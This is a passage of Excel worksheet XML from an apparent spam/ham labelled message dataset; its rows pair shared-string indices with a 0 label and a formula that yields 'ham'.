        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3420" t="s">
        <v>2818</v>
      </c>
      <c r="B3420">
        <v>0</v>
      </c>
      <c r="C3420" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3421" t="s">
        <v>2819</v>
      </c>
      <c r="B3421">
        <v>0</v>
      </c>
      <c r="C3421" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3422" t="s">
        <v>2820</v>
      </c>
      <c r="B3422">
        <v>0</v>
      </c>
      <c r="C3422" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3423" t="s">
        <v>2821</v>
      </c>
      <c r="B3423">
        <v>0</v>
      </c>
      <c r="C3423" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3424" t="s">
        <v>2822</v>
      </c>
      <c r="B3424">
        <v>0</v>
      </c>
      <c r="C3424" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3425" t="s">
        <v>2823</v>
      </c>
      <c r="B3425">
        <v>0</v>
      </c>
      <c r="C3425" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3426" t="s">
        <v>2824</v>
      </c>
      <c r="B3426">
        <v>0</v>
      </c>
      <c r="C3426" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3427" t="s">
        <v>2825</v>
      </c>
      <c r="B3427">
        <v>0</v>
      </c>
      <c r="C3427" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3428" t="s">
        <v>2826</v>
      </c>
      <c r="B3428">
        <v>0</v>
      </c>
      <c r="C3428" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3429" t="s">
        <v>2827</v>
      </c>
      <c r="B3429">
        <v>0</v>
      </c>
      <c r="C3429" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3430" t="s">
        <v>2828</v>
      </c>
      <c r="B3430">
        <v>0</v>
      </c>
      <c r="C3430" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3431" t="s">
        <v>2829</v>
      </c>
      <c r="B3431">
        <v>0</v>
      </c>
      <c r="C3431" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3432" t="s">
        <v>2830</v>
      </c>
      <c r="B3432">
        <v>0</v>
      </c>
      <c r="C3432" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3433" t="s">
        <v>2831</v>
      </c>
      <c r="B3433">
        <v>0</v>
      </c>
      <c r="C3433" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3434" t="s">
        <v>2832</v>
      </c>
      <c r="B3434">
        <v>0</v>
      </c>
      <c r="C3434" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3435" t="s">
        <v>2833</v>
      </c>
      <c r="B3435">
        <v>0</v>
      </c>
      <c r="C3435" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3436" t="s">
        <v>2834</v>
      </c>
      <c r="B3436">
        <v>0</v>
      </c>
      <c r="C3436" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3437" t="s">
        <v>2835</v>
      </c>
      <c r="B3437">
        <v>0</v>
      </c>
      <c r="C3437" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3438" t="s">
        <v>2836</v>
      </c>
      <c r="B3438">
        <v>0</v>
      </c>
      <c r="C3438" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3439" t="s">
        <v>21</v>
      </c>
      <c r="B3439">
        <v>0</v>
      </c>
      <c r="C3439" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3440" t="s">
        <v>2837</v>
      </c>
      <c r="B3440">
        <v>0</v>
      </c>
      <c r="C3440" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3441" t="s">
        <v>2838</v>
      </c>
      <c r="B3441">
        <v>0</v>
      </c>
      <c r="C3441" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3442" t="s">
        <v>2839</v>
      </c>
      <c r="B3442">
        <v>0</v>
      </c>
      <c r="C3442" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3443" t="s">
        <v>2840</v>
      </c>
      <c r="B3443">
        <v>0</v>
      </c>
      <c r="C3443" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3444" t="s">
        <v>2841</v>
      </c>
      <c r="B3444">
        <v>0</v>
      </c>
      <c r="C3444" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3445" t="s">
        <v>2842</v>
      </c>
      <c r="B3445">
        <v>0</v>
      </c>
      <c r="C3445" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3446" t="s">
        <v>2843</v>
      </c>
      <c r="B3446">
        <v>0</v>
      </c>
      <c r="C3446" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3447" t="s">
        <v>2844</v>
      </c>
      <c r="B3447">
        <v>0</v>
      </c>
      <c r="C3447" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3448" t="s">
        <v>2845</v>
      </c>
      <c r="B3448">
        <v>0</v>
      </c>
      <c r="C3448" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3449" t="s">
        <v>2846</v>
      </c>
      <c r="B3449">
        <v>0</v>
      </c>
      <c r="C3449" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3450" t="s">
        <v>2847</v>
      </c>
      <c r="B3450">
        <v>0</v>
      </c>
      <c r="C3450" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3451" t="s">
        <v>2848</v>
      </c>
      <c r="B3451">
        <v>0</v>
      </c>
      <c r="C3451" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3452" t="s">
        <v>2849</v>
      </c>
      <c r="B3452">
        <v>0</v>
      </c>
      <c r="C3452" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3453" t="s">
        <v>2850</v>
      </c>
      <c r="B3453">
        <v>0</v>
      </c>
      <c r="C3453" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3454" t="s">
        <v>2851</v>
      </c>
      <c r="B3454">
        <v>0</v>
      </c>
      <c r="C3454" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3455" t="s">
        <v>21</v>
      </c>
      <c r="B3455">
        <v>0</v>
      </c>
      <c r="C3455" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3456" t="s">
        <v>2852</v>
      </c>
      <c r="B3456">
        <v>0</v>
      </c>
      <c r="C3456" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3457" t="s">
        <v>2853</v>
      </c>
      <c r="B3457">
        <v>0</v>
      </c>
      <c r="C3457" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3458" t="s">
        <v>21</v>
      </c>
      <c r="B3458">
        <v>0</v>
      </c>
      <c r="C3458" t="str">
        <f t="shared" ref="C3458:C3521" si="54">IF(B3458="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3459" t="s">
        <v>2854</v>
      </c>
      <c r="B3459">
        <v>0</v>
      </c>
      <c r="C3459" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3460" t="s">
        <v>2855</v>
      </c>
      <c r="B3460">
        <v>0</v>
      </c>
      <c r="C3460" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3461" t="s">
        <v>2856</v>
      </c>
      <c r="B3461">
        <v>0</v>
      </c>
      <c r="C3461" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3462" t="s">
        <v>21</v>
      </c>
      <c r="B3462">
        <v>0</v>
      </c>
      <c r="C3462" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3463" t="s">
        <v>2857</v>
      </c>
      <c r="B3463">
        <v>0</v>
      </c>
      <c r="C3463" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3464" t="s">
        <v>21</v>
      </c>
      <c r="B3464">
        <v>0</v>
      </c>
      <c r="C3464" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3465" t="s">
        <v>2858</v>
      </c>
      <c r="B3465">
        <v>0</v>
      </c>
      <c r="C3465" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3466" t="s">
        <v>2859</v>
      </c>
      <c r="B3466">
        <v>0</v>
      </c>
      <c r="C3466" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3467" t="s">
        <v>21</v>
      </c>
      <c r="B3467">
        <v>0</v>
      </c>
      <c r="C3467" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3468" t="s">
        <v>21</v>
      </c>
      <c r="B3468">
        <v>0</v>
      </c>
      <c r="C3468" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3469" t="s">
        <v>2860</v>
      </c>
      <c r="B3469">
        <v>0</v>
      </c>
      <c r="C3469" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3470" t="s">
        <v>2861</v>
      </c>
      <c r="B3470">
        <v>0</v>
      </c>
      <c r="C3470" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3471" t="s">
        <v>2862</v>
      </c>
      <c r="B3471">
        <v>0</v>
      </c>
      <c r="C3471" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3472" t="s">
        <v>2863</v>
      </c>
      <c r="B3472">
        <v>0</v>
      </c>
      <c r="C3472" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3473" t="s">
        <v>2864</v>
      </c>
      <c r="B3473">
        <v>0</v>
      </c>
      <c r="C3473" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3474" t="s">
        <v>2865</v>
      </c>
      <c r="B3474">
        <v>0</v>
      </c>
      <c r="C3474" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3475" t="s">
        <v>2866</v>
      </c>
      <c r="B3475">
        <v>0</v>
      </c>
      <c r="C3475" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3476" t="s">
        <v>2867</v>
      </c>
      <c r="B3476">
        <v>0</v>
      </c>
      <c r="C3476" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3477" t="s">
        <v>2868</v>
      </c>
      <c r="B3477">
        <v>0</v>
      </c>
      <c r="C3477" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3478" t="s">
        <v>2869</v>
      </c>
      <c r="B3478">
        <v>0</v>
      </c>
      <c r="C3478" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3479" t="s">
        <v>2870</v>
      </c>
      <c r="B3479">
        <v>0</v>
      </c>
      <c r="C3479" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3480" t="s">
        <v>2871</v>
      </c>
      <c r="B3480">
        <v>0</v>
      </c>
      <c r="C3480" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3481" t="s">
        <v>2872</v>
      </c>
      <c r="B3481">
        <v>0</v>
      </c>
      <c r="C3481" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3482" t="s">
        <v>2873</v>
      </c>
      <c r="B3482">
        <v>0</v>
      </c>
      <c r="C3482" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3483" t="s">
        <v>2874</v>
      </c>
      <c r="B3483">
        <v>0</v>
      </c>
      <c r="C3483" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3484" t="s">
        <v>2875</v>
      </c>
      <c r="B3484">
        <v>0</v>
      </c>
      <c r="C3484" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3485" t="s">
        <v>2876</v>
      </c>
      <c r="B3485">
        <v>0</v>
      </c>
      <c r="C3485" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3486" t="s">
        <v>2877</v>
      </c>
      <c r="B3486">
        <v>0</v>
      </c>
      <c r="C3486" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3487" t="s">
        <v>2878</v>
      </c>
      <c r="B3487">
        <v>0</v>
      </c>
      <c r="C3487" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3488" t="s">
        <v>21</v>
      </c>
      <c r="B3488">
        <v>0</v>
      </c>
      <c r="C3488" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3489" t="s">
        <v>2879</v>
      </c>
      <c r="B3489">
        <v>0</v>
      </c>
      <c r="C3489" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3490" t="s">
        <v>2880</v>
      </c>
      <c r="B3490">
        <v>0</v>
      </c>
      <c r="C3490" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3491" t="s">
        <v>2881</v>
      </c>
      <c r="B3491">
        <v>0</v>
      </c>
      <c r="C3491" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3492" t="s">
        <v>2882</v>
      </c>
      <c r="B3492">
        <v>0</v>
      </c>
      <c r="C3492" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3493" t="s">
        <v>2883</v>
      </c>
      <c r="B3493">
        <v>0</v>
      </c>
      <c r="C3493" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3494" t="s">
        <v>2884</v>
      </c>
      <c r="B3494">
        <v>0</v>
      </c>
      <c r="C3494" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3495" t="s">
        <v>2885</v>
      </c>
      <c r="B3495">
        <v>0</v>
      </c>
      <c r="C3495" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3496" t="s">
        <v>2886</v>
      </c>
      <c r="B3496">
        <v>0</v>
      </c>
      <c r="C3496" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3497" t="s">
        <v>2887</v>
      </c>
      <c r="B3497">
        <v>0</v>
      </c>
      <c r="C3497" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3498" t="s">
        <v>2888</v>
      </c>
      <c r="B3498">
        <v>0</v>
      </c>
      <c r="C3498" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3499" t="s">
        <v>2889</v>
      </c>
      <c r="B3499">
        <v>0</v>
      </c>
      <c r="C3499" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3500" t="s">
        <v>2890</v>
      </c>
      <c r="B3500">
        <v>0</v>
      </c>
      <c r="C3500" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3501" t="s">
        <v>2891</v>
      </c>
      <c r="B3501">
        <v>0</v>
      </c>
      <c r="C3501" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3502" t="s">
        <v>21</v>
      </c>
      <c r="B3502">
        <v>0</v>
      </c>
      <c r="C3502" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3503" t="s">
        <v>2892</v>
      </c>
      <c r="B3503">
        <v>0</v>
      </c>
      <c r="C3503" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3504" t="s">
        <v>2893</v>
      </c>
      <c r="B3504">
        <v>0</v>
      </c>
      <c r="C3504" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3505" t="s">
        <v>2894</v>
      </c>
      <c r="B3505">
        <v>0</v>
      </c>
      <c r="C3505" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3506" t="s">
        <v>21</v>
      </c>
      <c r="B3506">
        <v>0</v>
      </c>
      <c r="C3506" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3507" t="s">
        <v>21</v>
      </c>
      <c r="B3507">
        <v>0</v>
      </c>
      <c r="C3507" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3508" t="s">
        <v>2895</v>
      </c>
      <c r="B3508">
        <v>0</v>
      </c>
      <c r="C3508" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3509" t="s">
        <v>2896</v>
      </c>
      <c r="B3509">
        <v>0</v>
      </c>
      <c r="C3509" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3510" t="s">
        <v>2897</v>
      </c>
      <c r="B3510">
        <v>0</v>
      </c>
      <c r="C3510" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3511" t="s">
        <v>2898</v>
      </c>
      <c r="B3511">
        <v>0</v>
      </c>
      <c r="C3511" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3512" t="s">
        <v>2899</v>
      </c>
      <c r="B3512">
        <v>0</v>
      </c>
      <c r="C3512" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3513" t="s">
        <v>2900</v>
      </c>
      <c r="B3513">
        <v>0</v>
      </c>
      <c r="C3513" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3514" t="s">
        <v>2901</v>
      </c>
      <c r="B3514">
        <v>0</v>
      </c>
      <c r="C3514" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3515" t="s">
        <v>2902</v>
      </c>
      <c r="B3515">
        <v>0</v>
      </c>
      <c r="C3515" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3516" t="s">
        <v>2903</v>
      </c>
      <c r="B3516">
        <v>0</v>
      </c>
      <c r="C3516" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3517" t="s">
        <v>2904</v>
      </c>
      <c r="B3517">
        <v>0</v>
      </c>
      <c r="C3517" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3518" t="s">
        <v>2905</v>
      </c>
      <c r="B3518">
        <v>0</v>
      </c>
      <c r="C3518" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3519" t="s">
        <v>2906</v>
      </c>
      <c r="B3519">
        <v>0</v>
      </c>
      <c r="C3519" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3520" t="s">
        <v>21</v>
      </c>
      <c r="B3520">
        <v>0</v>
      </c>
      <c r="C3520" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3521" t="s">
        <v>2907</v>
      </c>
      <c r="B3521">
        <v>0</v>
      </c>
      <c r="C3521" t="str">
        <f t="shared" si="54"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3522" t="s">
        <v>2908</v>
      </c>
      <c r="B3522">
        <v>0</v>
      </c>
      <c r="C3522" t="str">
        <f t="shared" ref="C3522:C3585" si="55">IF(B3522="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3523" t="s">
        <v>2909</v>
      </c>
      <c r="B3523">
        <v>0</v>
      </c>
      <c r="C3523" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3524" t="s">
        <v>2910</v>
      </c>
      <c r="B3524">
        <v>0</v>
      </c>
      <c r="C3524" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3525" t="s">
        <v>2911</v>
      </c>
      <c r="B3525">
        <v>0</v>
      </c>
      <c r="C3525" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3526" t="s">
        <v>2912</v>
      </c>
      <c r="B3526">
        <v>0</v>
      </c>
      <c r="C3526" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3527" t="s">
        <v>2913</v>
      </c>
      <c r="B3527">
        <v>0</v>
      </c>
      <c r="C3527" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3528" t="s">
        <v>2914</v>
      </c>
      <c r="B3528">
        <v>0</v>
      </c>
      <c r="C3528" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3529" t="s">
        <v>2915</v>
      </c>
      <c r="B3529">
        <v>0</v>
      </c>
      <c r="C3529" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3530" t="s">
        <v>2916</v>
      </c>
      <c r="B3530">
        <v>0</v>
      </c>
      <c r="C3530" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3531" t="s">
        <v>2917</v>
      </c>
      <c r="B3531">
        <v>0</v>
      </c>
      <c r="C3531" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
